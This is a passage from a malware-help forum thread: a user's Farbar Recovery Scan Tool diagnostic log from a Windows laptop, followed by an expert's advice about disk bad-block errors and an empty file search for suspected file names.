    Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
    Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&page=tsInstall
    Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
    Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
    Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
    Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
    Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
    Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
    Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
    Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
    Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
    Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square

    ==================== Loaded Modules (Whitelisted) ==============

    2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
    2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
    2016-08-06 14:07 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
    2017-01-10 17:37 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
    2017-01-10 17:37 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
    2017-01-10 17:37 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
    2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
    2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
    2016-04-01 13:57 - 2016-12-28 12:03 - 08924864 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
    2017-02-01 08:44 - 2017-01-13 13:51 - 00023328 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\lang\en-us\bdsystray.txtui
    2016-09-29 12:48 - 2016-09-29 12:48 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
    2017-01-10 22:45 - 2016-12-21 01:54 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
    2017-01-10 22:45 - 2016-12-21 01:48 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
    2017-01-10 22:46 - 2016-12-21 01:53 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
    2017-01-24 21:46 - 2017-01-24 21:46 - 03865600 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1701.10102.0_x64__8wekyb3d8bbwe\Calculator.exe

    ==================== Alternate Data Streams (Whitelisted) =========

    (If an entry is included in the fixlist, only the ADS will be removed.)

    AlternateDataStreams: C:\Users\Joseph\Downloads\AdwCleaner.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\Firefox Setup Stub 51.0.1.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\FRST64.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT (1).exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\JRT.exe:BDU [0]
    AlternateDataStreams: C:\Users\Joseph\Downloads\mb3-setup-cb.NT-3.0.6.1469.exe:BDU [0]

    ==================== Safe Mode (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""="Service"

    ==================== Association (Whitelisted) ===============

    (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


    ==================== Internet Explorer trusted/restricted ===============

    (If an entry is included in the fixlist, it will be removed from the registry.)


    ==================== Hosts content: ===============================

    (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

    2015-10-30 02:24 - 2017-02-02 11:45 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


    ==================== Other Areas ============================

    (Currently there is no automatic fix for this section.)

    HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
    DNS Servers: Media is not connected to internet.
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
    Windows Firewall is enabled.

    ==================== MSCONFIG/TASK MANAGER disabled items ==


    ==================== FirewallRules (Whitelisted) ===============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    FirewallRules: [vm-monitoring-nb-session] => LPort=139
    FirewallRules: [{0308E923-8487-403F-B445-D15ED8CCCB95}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
    FirewallRules: [{E42A29D0-C19D-4D1C-8FE2-D850981AEBA8}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
    FirewallRules: [{29F940E0-B1B5-45D6-9E75-4BECF8FB67FC}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
    FirewallRules: [{B3262CE0-7120-40CC-B8E9-77C75A53DBCA}] => C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
    FirewallRules: [{F580D45B-9B87-4478-9D02-4FB5710B4EE2}] => C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
    FirewallRules: [{6C97C639-83FE-4D5D-A976-D178E54ACEBA}] => C:\Program Files (x86)\Skype\Phone\Skype.exe
    FirewallRules: [{D49EDF57-C52E-467F-A056-63D5BD0738D7}] => C:\Program Files\Intel Corporation\Intel WiDi\SmartAgentTest.exe
    FirewallRules: [{261EA2B7-45BC-4067-83D5-2418ADCEE9C8}] => C:\Program Files\Intel Corporation\Intel WiDi\Next\WirelessDisplay.exe
    FirewallRules: [{B59EE6A4-D725-4298-9685-DFD41B59B982}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiAppOld.exe
    FirewallRules: [{CF4CA95C-09CF-4959-9D76-68426CDA477D}] => C:\Program Files\Intel Corporation\Intel WiDi\WiDiApp.exe
    FirewallRules: [{080A3C37-1740-4E2C-815C-189C744E6E60}] => c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
    FirewallRules: [{A9134569-28FB-4867-B6F4-AA1D2E5E15EE}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{0334F46F-ABB7-4487-AA0B-5C39528FE3FC}] => C:\Program Files (x86)\Bonjour\mDNSResponder.exe
    FirewallRules: [{A0CD17AF-60E5-44AE-AC27-9328A673AC89}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{970594D0-4429-4C70-838A-D147ED3FC01F}] => C:\Program Files\Bonjour\mDNSResponder.exe
    FirewallRules: [{DBA71186-0545-49C3-8B27-EF841C1940ED}] => C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
    FirewallRules: [{EA52B792-A898-4EF8-AD47-E12D2BF5BD0A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\DeviceSetup.exe
    FirewallRules: [{A89935E6-6E46-4459-BA52-726242012FAF}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicator.exe
    FirewallRules: [{2C60681B-0038-4452-ADDE-3FC15C74708A}] => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPNetworkCommunicatorCom.exe
    FirewallRules: [{0790D2E9-EA09-4D41-BA01-B8BC78ECD5DA}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    FirewallRules: [{DDE9F5AC-0598-494C-89AB-659FD2D18BBB}] => C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
    FirewallRules: [{C5ABB8F3-9C6A-48E2-9E61-D7DFAF7B05F7}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
    FirewallRules: [{D4F608B2-F97B-4617-8A32-8CEA999C5E3D}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{C23C9D12-7310-4478-8E06-5C73C5D2AC72}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{F04FC8DC-884B-4DD1-8B0B-79F29AED26C0}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{009CC8D2-7203-4597-901D-185455F173D9}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{5151A207-2082-465F-96EB-697F284CEFD2}] => C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
    FirewallRules: [{A75B0F26-5FC7-48B3-8D4D-90756AE6443A}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
    FirewallRules: [{80B7AC85-64A5-4029-9123-68203C3004D3}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe

    ==================== Restore Points =========================

    24-01-2017 15:52:44 Scheduled Checkpoint
    31-01-2017 20:53:13 end January 2017
    01-02-2017 17:15:49 JRT Pre-Junkware Removal
    01-02-2017 17:24:34 JRT Pre-Junkware Removal

    ==================== Faulty Device Manager Devices =============


    ==================== Event log errors: =========================

    Application errors:
    ==================
    Error: (02/02/2017 10:34:26 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel was terminated because it took too long to suspend.

    Error: (02/02/2017 10:20:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.ShellExperienceHost_10.0.14393.693_neutral_neutral_cw5n1h2txyewy+App was terminated because it took too long to suspend.

    Error: (02/02/2017 10:20:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/02/2017 10:19:09 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.AAD.BrokerPlugin_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/02/2017 10:12:33 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/02/2017 10:09:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: JOSEPHW)
    Description: Activation of app Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy!App failed with error: -2144927142 See the Microsoft-Windows-TWinUI/Operational log for additional information.

    Error: (02/01/2017 09:23:19 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:20:30 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: JOSEPHW)
    Description: Package Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy+CortanaUI was terminated because it took too long to suspend.

    Error: (02/01/2017 09:18:22 PM) (Source: Application Error) (EventID: 1000) (User: )
    Description: Faulting application name: IntelCpHDCPSvc.exe, version: 1.0.0.1, time stamp: 0x572a4b65
    Faulting module name: ntdll.dll, version: 10.0.14393.479, time stamp: 0x5825887f
    Exception code: 0xc0000005
    Fault offset: 0x000000000002f7db
    Faulting process id: 0xd20
    Faulting application start time: 0x01d27cfa9f3c35eb
    Faulting application path: C:\WINDOWS\system32\IntelCpHDCPSvc.exe
    Faulting module path: C:\WINDOWS\SYSTEM32\ntdll.dll
    Report Id: a8ea9bde-d760-4dbc-832c-0766ee78aa5b
    Faulting package full name:
    Faulting package-relative application ID:

    Error: (02/01/2017 09:18:16 PM) (Source: DPTF) (EventID: 256) (User: )
    Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10608.329) TYPE: ERROR

    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
    Executing Function:  PolicyBase::takeControlOfOsc
    Message:  Failed to acquire OSC: Failure during execution of _OSC:
    DPTF Build Version:  8.1.10608.329
    DPTF Build Date:  May 13 2016 11:00:20
    Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
    Executing Function:  EsifServices::primitiveExecuteSet
    Message:  Error returned from ESIF services interface function call
    Participant:  NoParticipant
    Domain:  NoDomain
    ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
    ESIF Instance:  255
    ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]


    Policy:  Passive Policy 2 [2]


    System errors:
    =============
    Error: (02/02/2017 12:06:30 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:26 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:22 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:18 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:14 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:10 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:06 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:06:02 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:05:59 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.

    Error: (02/02/2017 12:05:55 PM) (Source: disk) (EventID: 7) (User: )
    Description: The device, \Device\Harddisk0\DR0, has a bad block.


    CodeIntegrity:
    ===================================
      Date: 2017-02-01 21:18:20.909
      Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\vsservp.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bitdefender\Bitdefender 2017\dbghelp.dll that did not meet the Custom 3 / Antimalware signing level requirements.

      Date: 2017-02-01 21:18:20.659
      Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


    ==================== Memory info ===========================

    Processor: Intel® Core™ i7-6500U CPU @ 2.50GHz
    Percentage of memory in use: 19%
    Total physical RAM: 16273.91 MB
    Available physical RAM: 13087.01 MB
    Total Virtual: 18705.91 MB
    Available Virtual: 15448.3 MB

    ==================== Drives ================================

    Drive c: (Windows) (Fixed) (Total:913.93 GB) (Free:831.09 GB) NTFS
    Drive d: (RECOVERY) (Fixed) (Total:16.35 GB) (Free:1.88 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive e: (Disc1) (CDROM) (Total:1 GB) (Free:0 GB) UDF

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 931.5 GB) (Disk ID: D379171D)

    Partition: GPT.

    ==================== End of Addition.txt ============================



    #11
    mw201

      Member

    • Topic Starter
    • 15 posts

    I ran the Disk Error Tool and it showed no errors... Is there anything else I can try?


    #12
    mw201

      Member

    • Topic Starter
    • 15 posts

    Thank you for all of your help! 


    #13
    RKinner

      Malware Expert

    • Expert
    • 20,031 posts
    • MVP

    I do not see my search.txt file.  Did you perhaps hit SCAN instead of File Search?  Please try it again.

     

    As far as the bad block error is concerned, it appears to still be there.  Sometimes you have to run the disk check several times to clear it.  Windows is a bit odd on hard drive numbering, so if you have any other drives, even USB type, then run the disk check on them.


    #14
    mw201

      Member

    • Topic Starter
    • 15 posts

    Got it! Sorry about that.

    Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (02-02-2017 13:06:15)
    Running from C:\Users\Joseph\Downloads
    Boot Mode: Normal

    ================== Search Files: "update_w32.exe;prtj.exe;svpn.exe;Book.xlt;Sheet.xlt" =============

    ====== End of Search ======


    #15
    mw201

      Member

    • Topic Starter
    • 15 posts

    I did a regular search, not a registry search.


    Edited by mw201, 02 February 2017 - 12:17 PM.
